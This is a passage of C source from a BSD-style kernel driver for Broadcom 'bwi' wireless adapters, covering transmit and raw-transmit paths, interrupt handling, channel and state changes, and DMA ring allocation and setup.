                        }
                }
                wh = NULL;      /* Catch any invalid use */

                if (bwi_encap(sc, idx, m, ni) != 0) {
                        /* 'm' is freed in bwi_encap() if we reach here */
                        if (ni != NULL)
                                ieee80211_free_node(ni);
                        ifp->if_oerrors++;
                        continue;
                }

                trans = 1;
                tbd->tbd_used++;
                idx = (idx + 1) % BWI_TX_NDESC;

                ifp->if_opackets++;

                if (tbd->tbd_used + BWI_TX_NSPRDESC >= BWI_TX_NDESC) {
                        ifp->if_drv_flags |= IFF_DRV_OACTIVE;
                        break;
                }
        }
        tbd->tbd_idx = idx;

        if (trans)
                sc->sc_tx_timer = 5;
}

static int
bwi_raw_xmit(struct ieee80211_node *ni, struct mbuf *m,
    const struct ieee80211_bpf_params *params)
{
        struct ieee80211com *ic = ni->ni_ic;
        struct ifnet *ifp = ic->ic_ifp;
        struct bwi_softc *sc = ifp->if_softc;
        /* XXX wme? */
        struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[BWI_TX_DATA_RING];
        int idx, error;

        if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) {
                ieee80211_free_node(ni);
                m_freem(m);
                return ENETDOWN;
        }

        BWI_LOCK(sc);
        idx = tbd->tbd_idx;
        KASSERT(tbd->tbd_buf[idx].tb_mbuf == NULL, ("slot %d not empty", idx));
        if (params == NULL) {
                /*
                 * Legacy path; interpret frame contents to decide
                 * precisely how to send the frame.
                 */
                error = bwi_encap(sc, idx, m, ni);
        } else {
                /*
                 * Caller supplied explicit parameters to use in
                 * sending the frame.
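                 * This is the raw-transmit path: net80211 hands the driver
                 * a struct ieee80211_bpf_params (ibp_rate0, ibp_try1 and
                 * ibp_rate1 are the fields consumed by bwi_encap_raw()
                 * below), typically for frames injected from userland
                 * through a radiotap BPF attachment rather than frames
                 * built by the stack itself.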
*/ error = bwi_encap_raw(sc, idx, m, ni, params); } if (error == 0) { ifp->if_opackets++; if (++tbd->tbd_used + BWI_TX_NSPRDESC >= BWI_TX_NDESC) ifp->if_drv_flags |= IFF_DRV_OACTIVE; tbd->tbd_idx = (idx + 1) % BWI_TX_NDESC; sc->sc_tx_timer = 5; } else { /* NB: m is reclaimed on encap failure */ ieee80211_free_node(ni); ifp->if_oerrors++; } BWI_UNLOCK(sc); return error; } static void bwi_watchdog(void *arg) { struct bwi_softc *sc; struct ifnet *ifp; sc = arg; ifp = sc->sc_ifp; BWI_ASSERT_LOCKED(sc); if (sc->sc_tx_timer != 0 && --sc->sc_tx_timer == 0) { if_printf(ifp, "watchdog timeout\n"); ifp->if_oerrors++; taskqueue_enqueue(sc->sc_tq, &sc->sc_restart_task); } callout_reset(&sc->sc_watchdog_timer, hz, bwi_watchdog, sc); } static void bwi_stop(struct bwi_softc *sc, int statechg) { BWI_LOCK(sc); bwi_stop_locked(sc, statechg); BWI_UNLOCK(sc); } static void bwi_stop_locked(struct bwi_softc *sc, int statechg) { struct ifnet *ifp = sc->sc_ifp; struct bwi_mac *mac; int i, error, pwr_off = 0; BWI_ASSERT_LOCKED(sc); callout_stop(&sc->sc_calib_ch); callout_stop(&sc->sc_led_blink_ch); sc->sc_led_blinking = 0; sc->sc_flags |= BWI_F_STOP; if (ifp->if_drv_flags & IFF_DRV_RUNNING) { KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; bwi_disable_intrs(sc, BWI_ALL_INTRS); CSR_READ_4(sc, BWI_MAC_INTR_MASK); bwi_mac_stop(mac); } for (i = 0; i < sc->sc_nmac; ++i) { struct bwi_regwin *old_rw; mac = &sc->sc_mac[i]; if ((mac->mac_flags & BWI_MAC_F_INITED) == 0) continue; error = bwi_regwin_switch(sc, &mac->mac_regwin, &old_rw); if (error) continue; bwi_mac_shutdown(mac); pwr_off = 1; bwi_regwin_switch(sc, old_rw, NULL); } if (pwr_off) bwi_bbp_power_off(sc); sc->sc_tx_timer = 0; callout_stop(&sc->sc_watchdog_timer); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); } void bwi_intr(void *xsc) { struct bwi_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; struct bwi_mac *mac; uint32_t intr_status; uint32_t txrx_intr_status[BWI_TXRX_NRING]; int i, txrx_error, tx = 0, rx_data = -1; BWI_LOCK(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || (sc->sc_flags & BWI_F_STOP)) { BWI_UNLOCK(sc); return; } /* * Get interrupt status */ intr_status = CSR_READ_4(sc, BWI_MAC_INTR_STATUS); if (intr_status == 0xffffffff) { /* Not for us */ BWI_UNLOCK(sc); return; } DPRINTF(sc, BWI_DBG_INTR, "intr status 0x%08x\n", intr_status); intr_status &= CSR_READ_4(sc, BWI_MAC_INTR_MASK); if (intr_status == 0) { /* Nothing is interesting */ BWI_UNLOCK(sc); return; } KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; txrx_error = 0; DPRINTF(sc, BWI_DBG_INTR, "%s\n", "TX/RX intr"); for (i = 0; i < BWI_TXRX_NRING; ++i) { uint32_t mask; if (BWI_TXRX_IS_RX(i)) mask = BWI_TXRX_RX_INTRS; else mask = BWI_TXRX_TX_INTRS; txrx_intr_status[i] = CSR_READ_4(sc, BWI_TXRX_INTR_STATUS(i)) & mask; _DPRINTF(sc, BWI_DBG_INTR, ", %d 0x%08x", i, txrx_intr_status[i]); if (txrx_intr_status[i] & BWI_TXRX_INTR_ERROR) { if_printf(ifp, "%s: intr fatal TX/RX (%d) error 0x%08x\n", __func__, i, txrx_intr_status[i]); txrx_error = 1; } } _DPRINTF(sc, BWI_DBG_INTR, "%s\n", ""); /* * Acknowledge interrupt */ CSR_WRITE_4(sc, BWI_MAC_INTR_STATUS, intr_status); for (i = 0; i < BWI_TXRX_NRING; ++i) CSR_WRITE_4(sc, BWI_TXRX_INTR_STATUS(i), txrx_intr_status[i]); /* Disable all interrupts */ bwi_disable_intrs(sc, BWI_ALL_INTRS); /* * 
http://bcm-specs.sipsolutions.net/Interrupts * Says for this bit (0x800): * "Fatal Error * * We got this one while testing things when by accident the * template ram wasn't set to big endian when it should have * been after writing the initial values. It keeps on being * triggered, the only way to stop it seems to shut down the * chip." * * Suggesting that we should never get it and if we do we're not * feeding TX packets into the MAC correctly if we do... Apparently, * it is valid only on mac version 5 and higher, but I couldn't * find a reference for that... Since I see them from time to time * on my card, this suggests an error in the tx path still... */ if (intr_status & BWI_INTR_PHY_TXERR) { if (mac->mac_flags & BWI_MAC_F_PHYE_RESET) { if_printf(ifp, "%s: intr PHY TX error\n", __func__); taskqueue_enqueue(sc->sc_tq, &sc->sc_restart_task); BWI_UNLOCK(sc); return; } } if (txrx_error) { /* TODO: reset device */ } if (intr_status & BWI_INTR_TBTT) bwi_mac_config_ps(mac); if (intr_status & BWI_INTR_EO_ATIM) if_printf(ifp, "EO_ATIM\n"); if (intr_status & BWI_INTR_PMQ) { for (;;) { if ((CSR_READ_4(sc, BWI_MAC_PS_STATUS) & 0x8) == 0) break; } CSR_WRITE_2(sc, BWI_MAC_PS_STATUS, 0x2); } if (intr_status & BWI_INTR_NOISE) if_printf(ifp, "intr noise\n"); if (txrx_intr_status[0] & BWI_TXRX_INTR_RX) { rx_data = sc->sc_rxeof(sc); if (sc->sc_flags & BWI_F_STOP) { BWI_UNLOCK(sc); return; } } if (txrx_intr_status[3] & BWI_TXRX_INTR_RX) { sc->sc_txeof_status(sc); tx = 1; } if (intr_status & BWI_INTR_TX_DONE) { bwi_txeof(sc); tx = 1; } /* Re-enable interrupts */ bwi_enable_intrs(sc, BWI_INIT_INTRS); if (sc->sc_blink_led != NULL && sc->sc_led_blink) { int evt = BWI_LED_EVENT_NONE; if (tx && rx_data > 0) { if (sc->sc_rx_rate > sc->sc_tx_rate) evt = BWI_LED_EVENT_RX; else evt = BWI_LED_EVENT_TX; } else if (tx) { evt = BWI_LED_EVENT_TX; } else if (rx_data > 0) { evt = BWI_LED_EVENT_RX; } else if (rx_data == 0) { evt = BWI_LED_EVENT_POLL; } if (evt != BWI_LED_EVENT_NONE) bwi_led_event(sc, evt); } BWI_UNLOCK(sc); } static void bwi_scan_start(struct ieee80211com *ic) { struct bwi_softc *sc = ic->ic_ifp->if_softc; BWI_LOCK(sc); /* Enable MAC beacon promiscuity */ CSR_SETBITS_4(sc, BWI_MAC_STATUS, BWI_MAC_STATUS_PASS_BCN); BWI_UNLOCK(sc); } static void bwi_set_channel(struct ieee80211com *ic) { struct bwi_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_channel *c = ic->ic_curchan; struct bwi_mac *mac; BWI_LOCK(sc); KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; bwi_rf_set_chan(mac, ieee80211_chan2ieee(ic, c), 0); sc->sc_rates = ieee80211_get_ratetable(c); /* * Setup radio tap channel freq and flags */ sc->sc_tx_th.wt_chan_freq = sc->sc_rx_th.wr_chan_freq = htole16(c->ic_freq); sc->sc_tx_th.wt_chan_flags = sc->sc_rx_th.wr_chan_flags = htole16(c->ic_flags & 0xffff); BWI_UNLOCK(sc); } static void bwi_scan_end(struct ieee80211com *ic) { struct bwi_softc *sc = ic->ic_ifp->if_softc; BWI_LOCK(sc); CSR_CLRBITS_4(sc, BWI_MAC_STATUS, BWI_MAC_STATUS_PASS_BCN); BWI_UNLOCK(sc); } static int bwi_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct bwi_vap *bvp = BWI_VAP(vap); struct ieee80211com *ic= vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; enum ieee80211_state ostate = vap->iv_state; struct bwi_softc *sc = ifp->if_softc; struct bwi_mac *mac; int error; BWI_LOCK(sc); callout_stop(&sc->sc_calib_ch); if (nstate == IEEE80211_S_INIT) sc->sc_txpwrcb_type = BWI_TXPWR_INIT; bwi_led_newstate(sc, 
nstate); error = bvp->bv_newstate(vap, nstate, arg); if (error != 0) goto back; /* * Clear the BSSID when we stop a STA */ if (vap->iv_opmode == IEEE80211_M_STA) { if (ostate == IEEE80211_S_RUN && nstate != IEEE80211_S_RUN) { /* * Clear out the BSSID. If we reassociate to * the same AP, this will reinialize things * correctly... */ if (ic->ic_opmode == IEEE80211_M_STA && !(sc->sc_flags & BWI_F_STOP)) bwi_set_bssid(sc, bwi_zero_addr); } } if (vap->iv_opmode == IEEE80211_M_MONITOR) { /* Nothing to do */ } else if (nstate == IEEE80211_S_RUN) { bwi_set_bssid(sc, vap->iv_bss->ni_bssid); KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; /* Initial TX power calibration */ bwi_mac_calibrate_txpower(mac, BWI_TXPWR_INIT); #ifdef notyet sc->sc_txpwrcb_type = BWI_TXPWR_FORCE; #else sc->sc_txpwrcb_type = BWI_TXPWR_CALIB; #endif callout_reset(&sc->sc_calib_ch, hz, bwi_calibrate, sc); } back: BWI_UNLOCK(sc); return error; } static int bwi_media_change(struct ifnet *ifp) { int error = ieee80211_media_change(ifp); /* NB: only the fixed rate can change and that doesn't need a reset */ return (error == ENETRESET ? 0 : error); } static int bwi_dma_alloc(struct bwi_softc *sc) { int error, i, has_txstats; bus_addr_t lowaddr = 0; bus_size_t tx_ring_sz, rx_ring_sz, desc_sz = 0; uint32_t txrx_ctrl_step = 0; has_txstats = 0; for (i = 0; i < sc->sc_nmac; ++i) { if (sc->sc_mac[i].mac_flags & BWI_MAC_F_HAS_TXSTATS) { has_txstats = 1; break; } } switch (sc->sc_bus_space) { case BWI_BUS_SPACE_30BIT: case BWI_BUS_SPACE_32BIT: if (sc->sc_bus_space == BWI_BUS_SPACE_30BIT) lowaddr = BWI_BUS_SPACE_MAXADDR; else lowaddr = BUS_SPACE_MAXADDR_32BIT; desc_sz = sizeof(struct bwi_desc32); txrx_ctrl_step = 0x20; sc->sc_init_tx_ring = bwi_init_tx_ring32; sc->sc_free_tx_ring = bwi_free_tx_ring32; sc->sc_init_rx_ring = bwi_init_rx_ring32; sc->sc_free_rx_ring = bwi_free_rx_ring32; sc->sc_setup_rxdesc = bwi_setup_rx_desc32; sc->sc_setup_txdesc = bwi_setup_tx_desc32; sc->sc_rxeof = bwi_rxeof32; sc->sc_start_tx = bwi_start_tx32; if (has_txstats) { sc->sc_init_txstats = bwi_init_txstats32; sc->sc_free_txstats = bwi_free_txstats32; sc->sc_txeof_status = bwi_txeof_status32; } break; case BWI_BUS_SPACE_64BIT: lowaddr = BUS_SPACE_MAXADDR; /* XXX */ desc_sz = sizeof(struct bwi_desc64); txrx_ctrl_step = 0x40; sc->sc_init_tx_ring = bwi_init_tx_ring64; sc->sc_free_tx_ring = bwi_free_tx_ring64; sc->sc_init_rx_ring = bwi_init_rx_ring64; sc->sc_free_rx_ring = bwi_free_rx_ring64; sc->sc_setup_rxdesc = bwi_setup_rx_desc64; sc->sc_setup_txdesc = bwi_setup_tx_desc64; sc->sc_rxeof = bwi_rxeof64; sc->sc_start_tx = bwi_start_tx64; if (has_txstats) { sc->sc_init_txstats = bwi_init_txstats64; sc->sc_free_txstats = bwi_free_txstats64; sc->sc_txeof_status = bwi_txeof_status64; } break; } KASSERT(lowaddr != 0, ("lowaddr zero")); KASSERT(desc_sz != 0, ("desc_sz zero")); KASSERT(txrx_ctrl_step != 0, ("txrx_ctrl_step zero")); tx_ring_sz = roundup(desc_sz * BWI_TX_NDESC, BWI_RING_ALIGN); rx_ring_sz = roundup(desc_sz * BWI_RX_NDESC, BWI_RING_ALIGN); /* * Create top level DMA tag */ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), /* parent */ BWI_ALIGN, 0, /* alignment, bounds */ lowaddr, /* lowaddr */ BUS_SPACE_MAXADDR, /* highaddr */ NULL, NULL, /* filter, filterarg */ MAXBSIZE, /* maxsize */ BUS_SPACE_UNRESTRICTED, /* nsegments */ BUS_SPACE_MAXSIZE_32BIT, /* maxsegsize */ BUS_DMA_ALLOCNOW, /* flags */ NULL, NULL, /* lockfunc, lockarg */ 
&sc->sc_parent_dtag); if (error) { device_printf(sc->sc_dev, "can't create parent DMA tag\n"); return error; } #define TXRX_CTRL(idx) (BWI_TXRX_CTRL_BASE + (idx) * txrx_ctrl_step) /* * Create TX ring DMA stuffs */ error = bus_dma_tag_create(sc->sc_parent_dtag, BWI_RING_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, tx_ring_sz, 1, BUS_SPACE_MAXSIZE_32BIT, BUS_DMA_ALLOCNOW, NULL, NULL, &sc->sc_txring_dtag); if (error) { device_printf(sc->sc_dev, "can't create TX ring DMA tag\n"); return error; } for (i = 0; i < BWI_TX_NRING; ++i) { error = bwi_dma_ring_alloc(sc, sc->sc_txring_dtag, &sc->sc_tx_rdata[i], tx_ring_sz, TXRX_CTRL(i)); if (error) { device_printf(sc->sc_dev, "%dth TX ring " "DMA alloc failed\n", i); return error; } } /* * Create RX ring DMA stuffs */ error = bus_dma_tag_create(sc->sc_parent_dtag, BWI_RING_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, rx_ring_sz, 1, BUS_SPACE_MAXSIZE_32BIT, BUS_DMA_ALLOCNOW, NULL, NULL, &sc->sc_rxring_dtag); if (error) { device_printf(sc->sc_dev, "can't create RX ring DMA tag\n"); return error; } error = bwi_dma_ring_alloc(sc, sc->sc_rxring_dtag, &sc->sc_rx_rdata, rx_ring_sz, TXRX_CTRL(0)); if (error) { device_printf(sc->sc_dev, "RX ring DMA alloc failed\n"); return error; } if (has_txstats) { error = bwi_dma_txstats_alloc(sc, TXRX_CTRL(3), desc_sz); if (error) { device_printf(sc->sc_dev, "TX stats DMA alloc failed\n"); return error; } } #undef TXRX_CTRL return bwi_dma_mbuf_create(sc); } static void bwi_dma_free(struct bwi_softc *sc) { if (sc->sc_txring_dtag != NULL) { int i; for (i = 0; i < BWI_TX_NRING; ++i) { struct bwi_ring_data *rd = &sc->sc_tx_rdata[i]; if (rd->rdata_desc != NULL) { bus_dmamap_unload(sc->sc_txring_dtag, rd->rdata_dmap); bus_dmamem_free(sc->sc_txring_dtag, rd->rdata_desc, rd->rdata_dmap); } } bus_dma_tag_destroy(sc->sc_txring_dtag); } if (sc->sc_rxring_dtag != NULL) { struct bwi_ring_data *rd = &sc->sc_rx_rdata; if (rd->rdata_desc != NULL) { bus_dmamap_unload(sc->sc_rxring_dtag, rd->rdata_dmap); bus_dmamem_free(sc->sc_rxring_dtag, rd->rdata_desc, rd->rdata_dmap); } bus_dma_tag_destroy(sc->sc_rxring_dtag); } bwi_dma_txstats_free(sc); bwi_dma_mbuf_destroy(sc, BWI_TX_NRING, 1); if (sc->sc_parent_dtag != NULL) bus_dma_tag_destroy(sc->sc_parent_dtag); } static int bwi_dma_ring_alloc(struct bwi_softc *sc, bus_dma_tag_t dtag, struct bwi_ring_data *rd, bus_size_t size, uint32_t txrx_ctrl) { int error; error = bus_dmamem_alloc(dtag, &rd->rdata_desc, BUS_DMA_WAITOK | BUS_DMA_ZERO, &rd->rdata_dmap); if (error) { device_printf(sc->sc_dev, "can't allocate DMA mem\n"); return error; } error = bus_dmamap_load(dtag, rd->rdata_dmap, rd->rdata_desc, size, bwi_dma_ring_addr, &rd->rdata_paddr, BUS_DMA_NOWAIT); if (error) { device_printf(sc->sc_dev, "can't load DMA mem\n"); bus_dmamem_free(dtag, rd->rdata_desc, rd->rdata_dmap); rd->rdata_desc = NULL; return error; } rd->rdata_txrx_ctrl = txrx_ctrl; return 0; } static int bwi_dma_txstats_alloc(struct bwi_softc *sc, uint32_t ctrl_base, bus_size_t desc_sz) { struct bwi_txstats_data *st; bus_size_t dma_size; int error; st = malloc(sizeof(*st), M_DEVBUF, M_NOWAIT | M_ZERO); if (st == NULL) { device_printf(sc->sc_dev, "can't allocate txstats data\n"); return ENOMEM; } sc->sc_txstats = st; /* * Create TX stats descriptor DMA stuffs */ dma_size = roundup(desc_sz * BWI_TXSTATS_NDESC, BWI_RING_ALIGN); error = bus_dma_tag_create(sc->sc_parent_dtag, BWI_RING_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, dma_size, 1, BUS_SPACE_MAXSIZE_32BIT, BUS_DMA_ALLOCNOW, NULL, NULL, 
&st->stats_ring_dtag); if (error) { device_printf(sc->sc_dev, "can't create txstats ring " "DMA tag\n"); return error; } error = bus_dmamem_alloc(st->stats_ring_dtag, &st->stats_ring, BUS_DMA_WAITOK | BUS_DMA_ZERO, &st->stats_ring_dmap); if (error) { device_printf(sc->sc_dev, "can't allocate txstats ring " "DMA mem\n"); bus_dma_tag_destroy(st->stats_ring_dtag); st->stats_ring_dtag = NULL; return error; } error = bus_dmamap_load(st->stats_ring_dtag, st->stats_ring_dmap, st->stats_ring, dma_size, bwi_dma_ring_addr, &st->stats_ring_paddr, BUS_DMA_NOWAIT); if (error) { device_printf(sc->sc_dev, "can't load txstats ring DMA mem\n"); bus_dmamem_free(st->stats_ring_dtag, st->stats_ring, st->stats_ring_dmap); bus_dma_tag_destroy(st->stats_ring_dtag); st->stats_ring_dtag = NULL; return error; } /* * Create TX stats DMA stuffs */ dma_size = roundup(sizeof(struct bwi_txstats) * BWI_TXSTATS_NDESC, BWI_ALIGN); error = bus_dma_tag_create(sc->sc_parent_dtag, BWI_ALIGN, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, dma_size, 1, BUS_SPACE_MAXSIZE_32BIT, BUS_DMA_ALLOCNOW, NULL, NULL, &st->stats_dtag); if (error) { device_printf(sc->sc_dev, "can't create txstats DMA tag\n"); return error; } error = bus_dmamem_alloc(st->stats_dtag, (void **)&st->stats, BUS_DMA_WAITOK | BUS_DMA_ZERO, &st->stats_dmap); if (error) { device_printf(sc->sc_dev, "can't allocate txstats DMA mem\n"); bus_dma_tag_destroy(st->stats_dtag); st->stats_dtag = NULL; return error; } error = bus_dmamap_load(st->stats_dtag, st->stats_dmap, st->stats, dma_size, bwi_dma_ring_addr, &st->stats_paddr, BUS_DMA_NOWAIT); if (error) { device_printf(sc->sc_dev, "can't load txstats DMA mem\n"); bus_dmamem_free(st->stats_dtag, st->stats, st->stats_dmap); bus_dma_tag_destroy(st->stats_dtag); st->stats_dtag = NULL; return error; } st->stats_ctrl_base = ctrl_base; return 0; } static void bwi_dma_txstats_free(struct bwi_softc *sc) { struct bwi_txstats_data *st; if (sc->sc_txstats == NULL) return; st = sc->sc_txstats; if (st->stats_ring_dtag != NULL) { bus_dmamap_unload(st->stats_ring_dtag, st->stats_ring_dmap); bus_dmamem_free(st->stats_ring_dtag, st->stats_ring, st->stats_ring_dmap); bus_dma_tag_destroy(st->stats_ring_dtag); } if (st->stats_dtag != NULL) { bus_dmamap_unload(st->stats_dtag, st->stats_dmap); bus_dmamem_free(st->stats_dtag, st->stats, st->stats_dmap); bus_dma_tag_destroy(st->stats_dtag); } free(st, M_DEVBUF); } static void bwi_dma_ring_addr(void *arg, bus_dma_segment_t *seg, int nseg, int error) { KASSERT(nseg == 1, ("too many segments\n")); *((bus_addr_t *)arg) = seg->ds_addr; } static int bwi_dma_mbuf_create(struct bwi_softc *sc) { struct bwi_rxbuf_data *rbd = &sc->sc_rx_bdata; int i, j, k, ntx, error; /* * Create TX/RX mbuf DMA tag */ error = bus_dma_tag_create(sc->sc_parent_dtag, 1, 0, BUS_SPACE_MAXADDR, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, BUS_SPACE_MAXSIZE_32BIT, BUS_DMA_ALLOCNOW, NULL, NULL, &sc->sc_buf_dtag); if (error) { device_printf(sc->sc_dev, "can't create mbuf DMA tag\n"); return error; } ntx = 0; /* * Create TX mbuf DMA map */ for (i = 0; i < BWI_TX_NRING; ++i) { struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[i]; for (j = 0; j < BWI_TX_NDESC; ++j) { error = bus_dmamap_create(sc->sc_buf_dtag, 0, &tbd->tbd_buf[j].tb_dmap); if (error) { device_printf(sc->sc_dev, "can't create " "%dth tbd, %dth DMA map\n", i, j); ntx = i; for (k = 0; k < j; ++k) { bus_dmamap_destroy(sc->sc_buf_dtag, tbd->tbd_buf[k].tb_dmap); } goto fail; } } } ntx = BWI_TX_NRING; /* * Create RX mbuf DMA map and a spare DMA map */ error = 
bus_dmamap_create(sc->sc_buf_dtag, 0, &rbd->rbd_tmp_dmap); if (error) { device_printf(sc->sc_dev, "can't create spare RX buf DMA map\n"); goto fail; } for (j = 0; j < BWI_RX_NDESC; ++j) { error = bus_dmamap_create(sc->sc_buf_dtag, 0, &rbd->rbd_buf[j].rb_dmap); if (error) { device_printf(sc->sc_dev, "can't create %dth " "RX buf DMA map\n", j); for (k = 0; k < j; ++k) { bus_dmamap_destroy(sc->sc_buf_dtag, rbd->rbd_buf[j].rb_dmap); } bus_dmamap_destroy(sc->sc_buf_dtag, rbd->rbd_tmp_dmap); goto fail; } } return 0; fail: bwi_dma_mbuf_destroy(sc, ntx, 0); return error; } static void bwi_dma_mbuf_destroy(struct bwi_softc *sc, int ntx, int nrx) { int i, j; if (sc->sc_buf_dtag == NULL) return; for (i = 0; i < ntx; ++i) { struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[i]; for (j = 0; j < BWI_TX_NDESC; ++j) { struct bwi_txbuf *tb = &tbd->tbd_buf[j]; if (tb->tb_mbuf != NULL) { bus_dmamap_unload(sc->sc_buf_dtag, tb->tb_dmap); m_freem(tb->tb_mbuf); } if (tb->tb_ni != NULL) ieee80211_free_node(tb->tb_ni); bus_dmamap_destroy(sc->sc_buf_dtag, tb->tb_dmap); } } if (nrx) { struct bwi_rxbuf_data *rbd = &sc->sc_rx_bdata; bus_dmamap_destroy(sc->sc_buf_dtag, rbd->rbd_tmp_dmap); for (j = 0; j < BWI_RX_NDESC; ++j) { struct bwi_rxbuf *rb = &rbd->rbd_buf[j]; if (rb->rb_mbuf != NULL) { bus_dmamap_unload(sc->sc_buf_dtag, rb->rb_dmap); m_freem(rb->rb_mbuf); } bus_dmamap_destroy(sc->sc_buf_dtag, rb->rb_dmap); } } bus_dma_tag_destroy(sc->sc_buf_dtag); sc->sc_buf_dtag = NULL; } static void bwi_enable_intrs(struct bwi_softc *sc, uint32_t enable_intrs) { CSR_SETBITS_4(sc, BWI_MAC_INTR_MASK, enable_intrs); } static void bwi_disable_intrs(struct bwi_softc *sc, uint32_t disable_intrs) { CSR_CLRBITS_4(sc, BWI_MAC_INTR_MASK, disable_intrs); } static int bwi_init_tx_ring32(struct bwi_softc *sc, int ring_idx) { struct bwi_ring_data *rd; struct bwi_txbuf_data *tbd; uint32_t val, addr_hi, addr_lo; KASSERT(ring_idx < BWI_TX_NRING, ("ring_idx %d", ring_idx)); rd = &sc->sc_tx_rdata[ring_idx]; tbd = &sc->sc_tx_bdata[ring_idx]; tbd->tbd_idx = 0; tbd->tbd_used = 0; bzero(rd->rdata_desc, sizeof(struct bwi_desc32) * BWI_TX_NDESC); bus_dmamap_sync(sc->sc_txring_dtag, rd->rdata_dmap, BUS_DMASYNC_PREWRITE); addr_lo = __SHIFTOUT(rd->rdata_paddr, BWI_TXRX32_RINGINFO_ADDR_MASK); addr_hi = __SHIFTOUT(rd->rdata_paddr, BWI_TXRX32_RINGINFO_FUNC_MASK); val = __SHIFTIN(addr_lo, BWI_TXRX32_RINGINFO_ADDR_MASK) | __SHIFTIN(BWI_TXRX32_RINGINFO_FUNC_TXRX, BWI_TXRX32_RINGINFO_FUNC_MASK); CSR_WRITE_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_RINGINFO, val); val = __SHIFTIN(addr_hi, BWI_TXRX32_CTRL_ADDRHI_MASK) | BWI_TXRX32_CTRL_ENABLE; CSR_WRITE_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_CTRL, val); return 0; } static void bwi_init_rxdesc_ring32(struct bwi_softc *sc, uint32_t ctrl_base, bus_addr_t paddr, int hdr_size, int ndesc) { uint32_t val, addr_hi, addr_lo; addr_lo = __SHIFTOUT(paddr, BWI_TXRX32_RINGINFO_ADDR_MASK); addr_hi = __SHIFTOUT(paddr, BWI_TXRX32_RINGINFO_FUNC_MASK); val = __SHIFTIN(addr_lo, BWI_TXRX32_RINGINFO_ADDR_MASK) | __SHIFTIN(BWI_TXRX32_RINGINFO_FUNC_TXRX, BWI_TXRX32_RINGINFO_FUNC_MASK); CSR_WRITE_4(sc, ctrl_base + BWI_RX32_RINGINFO, val); val = __SHIFTIN(hdr_size, BWI_RX32_CTRL_HDRSZ_MASK) | __SHIFTIN(addr_hi, BWI_TXRX32_CTRL_ADDRHI_MASK) | BWI_TXRX32_CTRL_ENABLE; CSR_WRITE_4(sc, ctrl_base + BWI_RX32_CTRL, val); CSR_WRITE_4(sc, ctrl_base + BWI_RX32_INDEX, (ndesc - 1) * sizeof(struct bwi_desc32)); } static int bwi_init_rx_ring32(struct bwi_softc *sc) { struct bwi_ring_data *rd = &sc->sc_rx_rdata; int i, error; sc->sc_rx_bdata.rbd_idx = 0; for (i = 0; i 
< BWI_RX_NDESC; ++i) { error = bwi_newbuf(sc, i, 1); if (error) { device_printf(sc->sc_dev, "can't allocate %dth RX buffer\n", i); return error; } } bus_dmamap_sync(sc->sc_rxring_dtag, rd->rdata_dmap, BUS_DMASYNC_PREWRITE); bwi_init_rxdesc_ring32(sc, rd->rdata_txrx_ctrl, rd->rdata_paddr, sizeof(struct bwi_rxbuf_hdr), BWI_RX_NDESC); return 0; } static int bwi_init_txstats32(struct bwi_softc *sc) { struct bwi_txstats_data *st = sc->sc_txstats; bus_addr_t stats_paddr; int i; bzero(st->stats, BWI_TXSTATS_NDESC * sizeof(struct bwi_txstats)); bus_dmamap_sync(st->stats_dtag, st->stats_dmap, BUS_DMASYNC_PREWRITE); st->stats_idx = 0; stats_paddr = st->stats_paddr; for (i = 0; i < BWI_TXSTATS_NDESC; ++i) { bwi_setup_desc32(sc, st->stats_ring, BWI_TXSTATS_NDESC, i, stats_paddr, sizeof(struct bwi_txstats), 0); stats_paddr += sizeof(struct bwi_txstats); } bus_dmamap_sync(st->stats_ring_dtag, st->stats_ring_dmap, BUS_DMASYNC_PREWRITE); bwi_init_rxdesc_ring32(sc, st->stats_ctrl_base, st->stats_ring_paddr, 0, BWI_TXSTATS_NDESC); return 0; } static void bwi_setup_rx_desc32(struct bwi_softc *sc, int buf_idx, bus_addr_t paddr, int buf_len) { struct bwi_ring_data *rd = &sc->sc_rx_rdata; KASSERT(buf_idx < BWI_RX_NDESC, ("buf_idx %d", buf_idx)); bwi_setup_desc32(sc, rd->rdata_desc, BWI_RX_NDESC, buf_idx, paddr, buf_len, 0); } static void bwi_setup_tx_desc32(struct bwi_softc *sc, struct bwi_ring_data *rd, int buf_idx, bus_addr_t paddr, int buf_len) { KASSERT(buf_idx < BWI_TX_NDESC, ("buf_idx %d", buf_idx)); bwi_setup_desc32(sc, rd->rdata_desc, BWI_TX_NDESC, buf_idx, paddr, buf_len, 1); } static int bwi_init_tx_ring64(struct bwi_softc *sc, int ring_idx) { /* TODO:64 */ return EOPNOTSUPP; } static int bwi_init_rx_ring64(struct bwi_softc *sc) { /* TODO:64 */ return EOPNOTSUPP; } static int bwi_init_txstats64(struct bwi_softc *sc) { /* TODO:64 */ return 